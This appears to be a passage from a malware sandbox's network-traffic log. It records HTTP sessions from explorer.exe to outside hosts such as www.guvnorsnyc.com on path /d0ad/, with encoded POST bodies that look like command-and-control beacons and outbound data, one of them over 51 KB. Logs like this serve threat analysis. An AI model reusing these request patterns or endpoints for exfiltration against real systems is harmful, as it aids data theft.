HL8U6i37Z9gj7pEwmtwpjUIWsuEn0JsljI~TeXS9squlBxKWwWDnd6v4gq~eqPZKY-ANEyZQo-I-FbP13ImiUDLbf5bZ3YJt71CmkGSJnlWbI9sWto8o5xKmQbPp3M3758NI8rbZU2JHn4zXm57TTayUA9tiVT3FDjRLBZ9kN5NQGa~wMOhxobsFMpjVc5K5t_ExykO7h9W0B_EcZ0uCKIu7mHE4wwLBFAleCNgEIhoeTZc89yXx8wFMuXyKroDaXXlpmfeuUIA-5E~nw-gcC0ZRgOv2FHH8wmSbtny441mJCKoNZo8XdcO6gzI4FD1HOiaAJlb4InktwpeT7hwJLpGLsW8BeY4nOqURTtcHYtwctbeuF5(YQSJsBjmT~gSWBClK(JJVhTDnOl64Mpys5tW9Fm4UdLh2TdYB(dSRozoh~gGgJ48tDs6qbBoa0Wba0RXTQo63CRfeFGpYeF6atTJrpTMdf4kbAP4Fo5vLH_t4RQvZQ9FWcxAx7K0QoQHoeXXug2l9ED5WqqNWRrx8FABuTRr4t-XuB1pGh7zmphMyZr0Kz1bn1l~nKxo_VSTFAxAH9ER3c2YYMyRmavj6mFAanNzAovL7wvUAPmW6gl2wcoYVx_FBgId-eJifd2gzfpQeuXznD-ZziS7rZmIt84Ysc4ddY2NlBtByzk3q1GphjlLUVfP4ErwWoRRuM71zlpxIR4LiMM0UPXjDrN7qGGZgZ0pGtEKw1lb6Dz1n1ivU52Yr2aFrelYFJ-7ZM3(Hxgeyqyh4v53OMOKTfQjFt_lgWYCeUKhflTZKYp~Rpri7CWf9ANblsiuS(mLwOoh3B3xbbpDktmg9Nl4IDzeyAFRHrsJpiI7skfSJhax96wZ0Tkav2fPtmRuWdOwQXz~MDr0HFKLzg3TdX3nCm6nqRBwlqPxjs3f1D7jevZa6QkKZzMYUKdpCVRYjdceBj12ByfUydKUyhLi3S1tFkE9d1dbRuUNE97TsqmUkMJ7aqeIecdDCpPs19HTmn2UInHGsPiKCKN(g3YOxVcdbMFO1JuGojOabObVCRHLNtMZGMI74fWLB8mSVMGabepn
Oct 26, 2022 13:17:19.280539036 CEST	898	OUT	Data Raw: 5f 6e 45 30 50 72 59 6f 70 53 4a 71 79 72 39 31 31 79 41 30 7a 50 44 52 43 58 62 53 30 48 48 48 7a 49 4a 55 47 65 72 65 34 4e 35 67 44 58 49 41 56 54 55 74 38 38 53 44 67 36 32 46 6f 74 38 49 4f 64 76 59 49 44 76 6b 6b 6b 4e 28 4a 62 6c 34 63 37 Data Ascii: _nE0PrYopSJqyr911yA0zPDRCXbS0HHHzIJUGere4N5gDXIAVTUt88SDg62Fot8IOdvYIDvkkkN(Jbl4c7IB-mZiHo3aClPlUO7r21Fl0Rm0oIUyc32pDvqxh8-dDVG28MUlk(VmfqNCYrA57xARwfVI8uTsbsgP0x4xRlBl8YDiumfytiB7oW36JMt~Ut2eQx5OBb0uM2XSUQGXRlV2YngVgT3J-5QaGcjvmKvb_Uh5EIzQDVe
Oct 26, 2022 13:17:19.292627096 CEST	901	OUT	Data Raw: 74 71 77 47 6e 62 4b 6e 30 76 6d 7a 75 4b 2d 79 71 64 41 46 72 45 57 6e 54 64 53 4e 45 46 4d 47 5a 76 32 6c 71 48 46 42 6a 69 30 4c 33 37 79 52 6f 4f 62 64 59 46 43 42 51 51 36 4a 4c 73 75 79 68 62 36 54 67 55 2d 68 56 66 54 72 45 6b 66 74 78 41 Data Ascii: tqwGnbKn0vmzuK-yqdAFrEWnTdSNEFMGZv2lqHFBji0L37yRoObdYFCBQQ6JLsuyhb6TgU-hVfTrEkftxAU8kv5c_AJcowRA8mJkHbatHeiFeTH~OaMAzRx1KO1y_VHr-p5u5NSXf~eUF9Tte555Er81P8yU7lU04jODrXFW7l5a_ngS3CsDK0f1mh8rjIT9h07Ac61vBRaFbpjNf7OuNOcZONfT4ysNkyOaSzE8L5svwGBIqjd
Oct 26, 2022 13:17:19.292800903 CEST	904	OUT	Data Raw: 34 48 2d 57 41 75 4e 79 59 67 35 41 5a 5a 36 58 5f 56 33 7e 33 45 66 45 6e 56 58 51 4d 4c 76 69 67 53 44 6e 30 6a 4e 72 6d 58 4f 41 79 58 47 73 67 50 69 49 4b 75 4b 58 6a 34 4a 43 45 65 4a 78 61 56 71 6c 54 50 6a 7a 4c 48 32 50 70 65 61 4f 56 4f Data Ascii: 4H-WAuNyYg5AZZ6X_V3~3EfEnVXQMLvigSDn0jNrmXOAyXGsgPiIKuKXj4JCEeJxaVqlTPjzLH2PpeaOVOZ3i5SUebH2csyUFHj8tKSu6V6xMst25pqw9AX7qmkZ4T-ecx37-7rFmSm8BJRv89WL8WarO09YawiOmfbBWHuJuvcVz4dMCOmdyFAQtonx3x62mEzHvFkDZM4bAU39JtC~1qNIZsAOBUaIoidBjk_ygrlszR-Ch5T
Oct 26, 2022 13:17:19.292978048 CEST	909	OUT	Data Raw: 41 35 4e 45 6d 55 45 30 6c 54 54 54 6a 58 6e 67 62 7e 2d 77 42 28 32 54 6e 66 6b 32 30 71 4f 46 6a 57 6e 58 6d 65 37 79 6d 5a 69 44 2d 45 5f 61 4e 39 54 76 57 32 49 36 6a 78 75 57 32 32 38 4c 4e 72 31 65 77 6c 5a 65 4e 69 34 4e 73 69 4c 75 37 68 Data Ascii: A5NEmUE0lTTTjXngb~-wB(2Tnfk20qOFjWnXme7ymZiD-E_aN9TvW2I6jxuW228LNr1ewlZeNi4NsiLu7hp99cJ~dRmTkZo1JEPkJFq70KVwAkR95nxzmkJi7wuzHsck35Erqrvj5NdlthPAikbIBTVxTqEVb752NF-XNVFZANztQ4SUuABdBgbaxPAPRcSr7~OuoFpfmdJ5eiWe1~jt6LDr4GDwzDAGDK9p3couWCS6SJYrllj
Oct 26, 2022 13:17:19.293138981 CEST	915	OUT	Data Raw: 7a 67 6f 72 34 4a 76 44 70 4d 34 76 77 62 42 6d 6e 67 74 4f 59 73 6f 6d 47 51 56 66 4e 42 6c 4b 37 64 44 6c 39 74 4d 7a 70 4b 6f 75 6b 73 31 6c 55 58 4f 74 6e 74 45 39 53 38 6c 66 70 66 2d 66 49 4a 41 5a 72 4d 58 77 34 45 48 68 31 31 44 71 42 77 Data Ascii: zgor4JvDpM4vwbBmngtOYsomGQVfNBlK7dDl9tMzpKouks1lUXOtntE9S8lfpf-fIJAZrMXw4EHh11DqBwTjxRLP8u21MtinrfYn_AWkQgihzhL3gCQ9xp-enCPbGjTPgjnoYhd~Riqrb1iI3~DCdCW5ktlZEI9Bgk4P205SHMbJ42w9QZSdZ~Kjht2~LfAYQUPriZ85bMFOfnnh9lwNZq9BRLBQGf7KknhWYME9dkbrHSAViBg
Oct 26, 2022 13:17:19.293314934 CEST	924	OUT	Data Raw: 30 36 75 70 43 39 51 6e 4e 4b 62 6e 4d 76 4a 31 32 4e 47 6a 45 58 42 33 55 65 6b 49 63 61 68 64 6c 38 58 50 49 66 67 79 4f 58 6d 70 46 37 68 6e 58 4d 34 66 41 67 69 58 4a 77 4b 69 57 56 52 6e 76 73 52 7a 76 30 68 64 36 28 68 4b 31 42 57 78 6a 41 Data Ascii: 06upC9QnNKbnMvJ12NGjEXB3UekIcahdl8XPIfgyOXmpF7hnXM4fAgiXJwKiWVRnvsRzv0hd6(hK1BWxjAXJarDchHRIq59Cx9Dbj42tvdjDhHQHwTXXbzA2xJnWCBZ9BrVTsKrSPOfzx34J4NkIbyUjtZtp9cZGcwD5ga62F~VcnVBMB8d8ISurjcp7QisGppzuAcdoA9vABZ5Iq~BMW3WjyGVQLFcClvcjyuK0FkJ7q9Z2ahd
Oct 26, 2022 13:17:19.294287920 CEST	924	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:17:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:17:19.305057049 CEST	927	OUT	Data Raw: 62 68 7a 42 36 33 72 36 6a 54 50 45 30 43 4f 66 63 4e 31 52 54 51 62 6b 6e 54 45 56 6f 4c 6a 62 4b 65 54 33 43 61 75 57 76 79 46 34 59 73 69 56 47 6f 57 73 42 59 7a 7e 33 6c 70 4f 52 43 33 62 42 72 4d 5a 78 50 58 67 77 78 46 31 68 73 61 68 71 47 Data Ascii: bhzB63r6jTPE0COfcN1RTQbknTEVoLjbKeT3CauWvyF4YsiVGoWsBYz~3lpORC3bBrMZxPXgwxF1hsahqGgqyBa2kebkRo7siqcxZmCLYj4ZZwGcaXHzHjnvcmrqvsOmIDkvOGvOqqFqVzYb8veg5i8jx2xmy2p2C(A2DaqbO0l(y5tEW0SJXwPpLaVCZX5dIETgOQr28EQh5kYBxNNSZqB5_Qfq6kBm-Sk2IRuZmBaF8z6TkNR
Oct 26, 2022 13:17:19.305233002 CEST	937	OUT	Data Raw: 4f 65 44 6e 53 58 5f 59 41 63 64 45 61 4e 65 44 78 6c 74 35 52 50 49 6d 6c 76 70 6a 5a 4e 79 49 41 76 49 70 62 59 73 75 6a 63 75 65 66 49 4b 48 2d 4f 4f 65 59 4d 6f 32 39 64 65 4b 79 7e 69 4e 54 67 37 51 4a 65 72 78 4f 4d 71 68 77 50 4b 42 69 34 Data Ascii: OeDnSX_YAcdEaNeDxlt5RPImlvpjZNyIAvIpbYsujcuefIKH-OOeYMo29deKy~iNTg7QJerxOMqhwPKBi402G(UvlHvCZtYfhXE~ZmGfjs3XAxMCYhoaf49MgLcP_(Wwom97QAT0Jy7liXQ8KTzdVnkqqXgYhPSSX3bO89rlJHY5f3eViHTOnrFH6WUxdXOXY0BLKRydHFBvsqzWubmtmhek2VZ9YoH~l9fKTvuv36nTXsO96Qb
Oct 26, 2022 13:17:19.305402994 CEST	938	OUT	Data Raw: 51 4a 74 6c 2d 73 30 74 57 77 64 71 2d 49 39 45 48 35 4f 4a 35 64 5a 66 6a 28 53 55 63 41 6c 28 33 35 77 67 64 39 75 42 6e 56 52 6b 76 77 59 4d 4e 6a 64 4a 33 63 76 56 31 6b 31 54 32 67 43 6d 50 7e 4d 55 59 36 66 50 64 47 2d 64 4b 4e 6c 7e 72 75 Data Ascii: QJtl-s0tWwdq-I9EH5OJ5dZfj(SUcAl(35wgd9uBnVRkvwYMNjdJ3cvV1k1T2gCmP~MUY6fPdG-dKNl~ruyjKjb2HWDfPgR7eaFXB1BrJya9ZlhGTlH3qs2~ta-fH9G7fXm31XgtyALc5qIg7IzyRLboxUG73wvcyfYMR~TwFjs~Omqpc3ClnnjA491kD3cQHSJBtH6B9CTaD6lkYYkQvYNub9OvG8q5JPDyYP8OJVeUZgKIM~h

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.11.20	49877	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:21.310172081 CEST	939	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1 Host: www.altruista.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:17:21.324217081 CEST	939	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:17:21 GMT Content-Type: text/html Content-Length: 6637 Last-Modified: Thu, 21 Jan 2021 10:26:32 GMT Connection: close ETag: "600956d8-19ed" Server: UD Forwarding 3.1 Accept-Ranges: bytes
Oct 26, 2022 13:17:21.324382067 CEST	941	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description" content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,h
Oct 26, 2022 13:17:21.324460030 CEST	942	IN	Data Raw: 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 Data Ascii: pEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCP
Oct 26, 2022 13:17:21.324522972 CEST	943	IN	Data Raw: 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a Data Ascii: 7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA
Oct 26, 2022 13:17:21.324584007 CEST	945	IN	Data Raw: 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a Data Ascii: d0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC);overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#log
Oct 26, 2022 13:17:21.324637890 CEST	946	IN	Data Raw: 6c 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 Data Ascii: llt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite würden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains können Sie diese Domain in Ihre
Oct 26, 2022 13:17:21.324686050 CEST	946	IN	Data Raw: 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 Data Ascii: rel="nofollow noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">© united-domains AG. <span> Alle Rechte vorbehalten.</span></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.11.20	49878	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:26.382599115 CEST	948	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 50 58 6c 6b 76 2d 69 36 62 73 31 4a 7a 6d 6c 43 7e 75 33 38 4b 4c 7a 63 34 72 41 2d 28 6e 72 4a 33 78 68 44 57 32 78 36 69 7a 7e 46 53 56 56 6b 4f 6a 6b 72 55 71 4f 62 59 6a 78 39 6b 42 66 4c 44 6c 75 36 56 74 53 36 69 44 57 44 59 62 34 54 72 59 6c 65 46 53 42 53 65 37 57 4f 34 39 43 37 4a 46 4f 58 66 37 4b 36 6a 77 4f 7a 28 71 59 4c 71 61 66 75 39 4b 63 6f 47 4c 61 54 31 41 52 73 69 79 49 5a 42 71 46 68 74 44 66 77 71 6e 54 75 53 7a 6a 58 61 64 51 67 52 50 44 57 56 32 6a 41 46 65 58 58 32 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=~pjsN0Pv3nHLPXlkv-i6bs1JzmlC~u38KLzc4rA-(nrJ3xhDW2x6iz~FSVVkOjkrUqObYjx9kBfLDlu6VtS6iDWDYb4TrYleFSBSe7WO49C7JFOXf7K6jwOz(qYLqafu9KcoGLaT1ARsiyIZBqFhtDfwqnTuSzjXadQgRPDWV2jAFeXX2g).
Oct 26, 2022 13:17:26.394283056 CEST	948	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:17:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.11.20	49879	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:28.417936087 CEST	949	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 4e 32 56 6b 74 64 4b 36 50 38 31 47 74 32 6c 43 77 4f 33 34 4b 4b 50 63 34 75 67 75 28 78 37 4a 77 51 39 44 58 30 56 36 6e 7a 7e 46 5a 31 56 68 41 44 6b 61 55 71 7a 6d 59 69 4e 39 6b 48 7a 4c 52 67 36 36 53 64 53 35 74 54 57 41 4f 4c 34 65 68 34 6c 41 46 53 39 77 65 36 53 4f 28 4e 75 37 4b 48 32 58 56 50 65 31 70 77 4f 35 32 4b 59 49 6a 36 66 77 39 4b 59 4f 47 4b 6a 6b 30 78 31 73 73 32 38 5a 54 36 46 75 6e 7a 65 34 79 58 53 75 55 54 4f 4c 44 39 6b 69 49 65 50 6f 52 31 71 59 45 2d 4b 70 31 30 45 6c 54 54 77 45 30 50 67 75 39 4a 7e 4f 67 65 54 34 52 4b 55 78 37 5f 50 31 28 77 48 6e 63 58 69 5f 39 66 31 53 38 69 4c 38 36 4b 76 2d 64 6f 73 67 61 38 6f 77 58 73 49 7a 47 2d 77 34 33 75 6a 69 51 6d 51 6d 70 53 67 64 64 62 48 68 55 6c 77 67 71 35 63 6c 62 42 68 44 63 42 73 58 78 63 6c 41 79 33 59 31 66 79 46 79 56 77 62 2d 73 59 43 75 4c 6c 55 64 63 79 52 35 5a 38 69 50 43 7a 61 6f 5a 79 58 6b 46 45 4d 74 46 62 78 58 7a 77 64 56 68 66 54 51 70 34 4e 32 32 68 32 4a 72 47 41 36 34 53 7e 74 62 37 28 69 75 5f 74 33 38 4d 51 58 35 34 69 35 42 7a 49 4b 57 69 43 67 36 32 39 66 33 63 72 70 58 6a 31 4b 4f 6f 35 4e 50 49 38 65 4b 39 28 79 57 77 33 67 4d 39 59 45 4f 42 62 55 76 4a 56 5f 65 6c 76 54 6b 74 56 41 57 36 55 58 58 77 71 47 35 4c 44 7a 30 6f 7e 4d 66 38 68 4b 53 49 63 32 49 4c 43 4a 70 66 70 6b 77 62 48 45 68 34 47 59 6e 65 7a 7a 48 78 6c 6b 49 56 37 62 57 2d 7e 6b 41 36 4b 6d 5a 4a 76 38 42 38 75 66 6c 4b 6d 79 76 30 58 53 5a 34 6c 6c 51 4d 58 59 67 44 48 76 4b 4a 57 64 33 53 46 56 77 73 36 76 44 39 59 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=~pjsN0Pv3nHLN2VktdK6P81Gt2lCwO34KKPc4ugu(x7JwQ9DX0V6nz~FZ1VhADkaUqzmYiN9kHzLRg66SdS5tTWAOL4eh4lAFS9we6SO(Nu7KH2XVPe1pwO52KYIj6fw9KYOGKjk0x1ss28ZT6Funze4yXSuUTOLD9kiIePoR1qYE-Kp10ElTTwE0Pgu9J~OgeT4RKUx7_P1(wHncXi_9f1S8iL86Kv-dosga8owXsIzG-w43ujiQmQmpSgddbHhUlwgq5clbBhDcBsXxclAy3Y1fyFyVwb-sYCuLlUdcyR5Z8iPCzaoZyXkFEMtFbxXzwdVhfTQp4N22h2JrGA64S~tb7(iu_t38MQX54i5BzIKWiCg629f3crpXj1KOo5NPI8eK9(yWw3gM9YEOBbUvJV_elvTktVAW6UXXwqG5LDz0o~Mf8hKSIc2ILCJpfpkwbHEh4GYnezzHxlkIV7bW-~kA6KmZJv8B8uflKmyv0XSZ4llQMXYgDHvKJWd3SFVws6vD9Y.
Oct 26, 2022 13:17:28.430005074 CEST	950	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:17:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 76 6e 6f 72 73 6e 79 63 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.guvnorsnyc.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.11.20	49880	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:30.449599028 CEST	956	OUT	POST /d0ad/ HTTP/1.1 Host: www.guvnorsnyc.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.guvnorsnyc.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.guvnorsnyc.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 7e 70 6a 73 4e 30 50 76 33 6e 48 4c 4e 32 56 6b 74 64 4b 36 50 38 31 47 74 32 6c 43 77 4f 33 34 4b 4b 50 63 34 75 67 75 28 78 7a 4a 77 69 5a 44 57 55 70 36 6b 7a 7e 46 46 46 56 67 41 44 6b 48 55 75 65 68 59 69 42 48 6b 45 48 4c 52 33 6d 36 54 76 4b 35 6d 44 57 42 51 37 34 51 72 59 6b 44 46 53 42 61 65 2d 36 30 34 39 61 37 4a 42 47 58 66 64 32 36 6c 41 4f 7a 32 4b 59 79 70 71 66 57 39 4b 56 46 47 4b 66 6b 30 7a 42 73 6a 6a 34 5a 41 5a 64 75 71 44 65 35 6f 6e 53 62 64 7a 4f 45 44 39 67 51 49 65 50 34 52 30 75 59 45 38 43 70 32 7a 34 6d 53 7a 77 45 33 50 67 68 71 35 69 30 67 65 4f 39 52 4b 67 78 37 38 50 31 28 51 48 6e 59 32 69 2d 72 50 31 59 33 43 4c 6e 7e 4b 54 4d 64 6f 34 65 61 39 38 77 55 63 63 7a 63 76 77 34 6e 5f 6a 69 54 47 51 6b 6a 79 67 4f 49 72 47 2d 55 6d 59 43 71 34 38 54 62 47 5a 44 66 68 4d 58 68 4e 6c 44 69 48 5a 2d 61 79 46 64 52 31 43 5f 73 59 54 78 4c 6c 56 41 63 7a 6c 35 5a 4d 53 50 44 33 32 72 61 69 58 6a 65 30 4d 43 65 4c 39 4e 7a 77 42 64 68 65 72 41 70 34 35 32 33 42 32 4a 37 78 55 35 32 69 7e 71 48 4c 28 77 6a 66 74 67 38 4d 56 38 35 36 50 4f 42 6a 55 4b 48 42 36 67 74 57 39 63 38 63 71 69 64 44 31 32 4b 6f 35 4e 50 49 77 67 4b 39 37 79 57 67 28 67 65 36 55 45 46 79 7a 55 70 4a 56 6c 65 6c 76 34 6b 74 70 37 57 36 64 45 58 7a 43 73 35 4a 76 7a 31 39 69 4d 50 70 64 4a 5a 59 63 35 4d 4c 44 4a 74 66 6c 4a 77 62 72 4d 68 38 6d 69 6e 75 66 7a 56 6c 42 6b 4d 56 37 61 64 2d 7e 6a 58 4b 4c 76 54 5a 69 74 42 38 79 50 6c 4b 44 76 76 33 6e 53 49 4e 49 4d 55 4d 72 6a 33 78 62 34 4a 73 65 61 70 6a 6c 72 67 75 65 63 56 59 6d 44 7e 70 7e 43 38 63 74 4b 4c 6b 54 54 34 4d 61 70 62 37 4a 45 66 52 4d 67 47 61 68 70 76 4d 41 65 69 45 77 4f 7e 59 65 34 32 2d 49 77 49 66 76 38 6e 6a 76 6d 76 68 55 72 79 45 50 68 56 33 50 73 63 34 28 76 66 79 43 66 57 50 45 45 34 62 57 55 38 35 32 2d 33 55 32 39 4a 52 32 4f 59 79 79 50 52 68 65 5f 4b 63 64 66 6a 56 32 5f 54 38 6b 55 6f 52 79 52 70 57 55 78 4c 79 35 4e 71 67 54 64 69 51 6f 44 44 44 28 78 69 34 48 66 71 32 74 56 78 6c 38 77 53 71 56 48 56 71 31 77 55 65 46 63 55 30 4a 66 5a 45 36 69 4c 42 62 67 37 75 41 69 42 49 47 76 4e 41 58 32 43 42 6d 30 30 4e 36 50 50 63 63 6b 51 6f 55 54 7a 65 6a 6d 6f 68 41 31 70 41 63 74 72 71 77 4c 37 31 30 38 45 52 69 68 44 5f 41 57 6b 42 42 50 67 38 64 52 44 44 69 6b 76 46 43 75 72 32 4e 71 38 36 42 42 44 42 65 75 5a 38 65 32 47 41 28 65 6a 69 58 73 79 4d 6f 76 58 63 6b 34 4a 5a 7e 72 43 71 72 47 6d 44 69 34 75 4b 4a 6d 45 6d 39 44 64 34 58 62 31 44 32 66 47 58 6f 72 56 75 50 68 44 49 4c 42 31 4f 63 5a 32 32 66 33 72 62 44 42 72 68 65 38 75 47 35 56 30 4f 44 79 59 75 74 6c 4f 4c 46 33 35 61 37 6b 4e 57 38 4b 65 4b 4d 44 6c 63 58 75 4b 6d 46 46 77 6e 76 77 68 30 56 43 4a 76 46 4d 6e 6b 75 71 68 4c 71 45 33 35 76 4b 31 52 6d 31 6b 39 70 31 58 4b 4a 4b 41 77 